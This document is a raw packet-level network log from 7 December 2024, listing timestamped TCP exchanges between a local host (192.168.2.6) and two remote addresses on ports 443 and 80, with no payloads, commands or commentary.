Dec 7, 2024 10:51:52.081087112 CET	49833	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:52.081087112 CET	49833	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:52.081110001 CET	443	49833	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:52.081120014 CET	443	49833	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:52.081397057 CET	49836	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:52.081432104 CET	443	49836	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:52.081444025 CET	49837	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:52.081480980 CET	443	49837	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:52.081501961 CET	49836	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:52.081836939 CET	49836	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:52.081849098 CET	443	49836	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:52.081924915 CET	49837	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:52.082030058 CET	49837	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:52.082047939 CET	443	49837	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:52.085510015 CET	49838	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:52.085525036 CET	443	49838	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:52.085642099 CET	49838	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:52.085743904 CET	49838	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:52.085751057 CET	443	49838	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:52.118972063 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.119086027 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.119117022 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.119189024 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.119357109 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.119477034 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.119489908 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.119575977 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.120244026 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.120352030 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.120362043 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.120532036 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.121161938 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.121277094 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.121340036 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.122081995 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.122162104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.122188091 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.122572899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.123004913 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.123111963 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.123158932 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.123291969 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.124010086 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.124054909 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.124075890 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.124583006 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.124820948 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.124896049 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.124960899 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.125091076 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.125690937 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.125798941 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.125821114 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.126007080 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.126625061 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.126730919 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.126754045 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.127190113 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.127542973 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.127654076 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.127676010 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.128448009 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.128540039 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.128562927 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.129342079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.129479885 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.129504919 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.130295992 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.130322933 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.130379915 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.131169081 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.131192923 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.131248951 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.132106066 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.132131100 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.132170916 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.132947922 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.132973909 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.133043051 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.134113073 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.166367054 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.166466951 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.166507006 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.166692019 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.166907072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.167011976 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.167043924 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.167043924 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.167813063 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.167923927 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.167951107 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.168317080 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.168695927 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.168843031 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.168868065 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.168894053 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.169598103 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.169704914 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.169720888 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.169799089 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.170521975 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.170588017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.170670033 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.171437979 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.171542883 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.171549082 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.172090054 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.172318935 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.172413111 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.172450066 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.172799110 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.173250914 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.173314095 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.173338890 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.173414946 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.174150944 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.174258947 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.174397945 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.175091982 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.175152063 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.175162077 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.175204039 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.175956964 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.176055908 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.176080942 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.176949024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.177069902 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.177109003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.177392006 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.177756071 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.177799940 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.177836895 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.178198099 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.178761005 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.178781986 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.178859949 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.179582119 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.179665089 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.179706097 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.179755926 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.180550098 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.180613041 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.180659056 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.181111097 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.181401968 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.181485891 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.181523085 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.181761980 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.182472944 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.182502031 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.182555914 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.182555914 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.183201075 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.183332920 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.183356047 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.183799028 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.184107065 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.184175968 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.184191942 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.184282064 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.185060978 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.185173988 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.185197115 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.185271978 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.185926914 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.185985088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.185993910 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.186039925 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.186862946 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.186928034 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.186968088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.187177896 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.187764883 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.187881947 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.187922001 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.188704014 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.188816071 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.188817024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.188932896 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.189600945 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.189675093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.189773083 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.190464020 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.190579891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.190813065 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.191561937 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.191674948 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.191704988 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.191781044 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.192416906 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.192485094 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.192487955 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.192837954 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.193186998 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.193289995 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.193291903 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.193375111 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.194112062 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.194175959 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.194242954 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.194627047 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.194983006 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.195106030 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.195238113 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.195966005 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.196043015 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.196058989 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.196086884 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.196796894 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.196892023 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.196983099 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.197091103 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.197724104 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.197786093 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.197853088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.197963953 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.198615074 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.198709965 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.311127901 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.311223030 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.311423063 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.311463118 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.311639071 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.311770916 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.311799049 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.312542915 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.312655926 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.312680006 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.313004971 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.313463926 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.313566923 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.313590050 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.314224005 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.314346075 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.314449072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.314470053 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.315325022 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.315391064 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.315412998 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.315493107 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.316176891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.316262960 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.316382885 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.317081928 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.317188978 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.317213058 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.317986965 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.318099022 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.318110943 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.318589926 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.318891048 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.319037914 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.319065094 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.319125891 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.319782972 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.319909096 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.319921017 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.320110083 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.320712090 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.320924044 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.320946932 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.321600914 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.321731091 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.321753979 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.322026968 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.322509050 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.322624922 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.322690964 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.322690964 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.323417902 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.323520899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.323520899 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.324312925 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.324423075 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.324443102 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.324626923 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.325206995 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.325759888 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.358872890 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.358894110 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.358941078 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.358964920 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.359035015 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.359057903 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.359144926 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.359781981 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.359822989 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.359842062 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.360081911 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.360646009 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.360750914 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.360757113 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.360867977 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.361594915 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.361656904 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.361757994 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.362456083 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.362569094 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.362926960 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.363353968 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.363459110 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.363482952 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.363707066 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.364300966 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.364366055 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.364391088 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.364598989 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.365216017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.365272999 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.365752935 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.366094112 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.366159916 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.366204023 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.366394043 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.366986990 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.367075920 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.367115021 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.367320061 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.367929935 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.367994070 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.368391037 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.368805885 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.368904114 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.368917942 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.369050026 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.369688034 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.369843960 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.369889021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.369889021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.370666981 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.370740891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.370764971 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.370946884 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.371539116 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.371702909 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.371762991 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.372457027 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.372524977 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.372548103 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.372685909 CET	49808	80	192.168.2.6	185.215.113.206
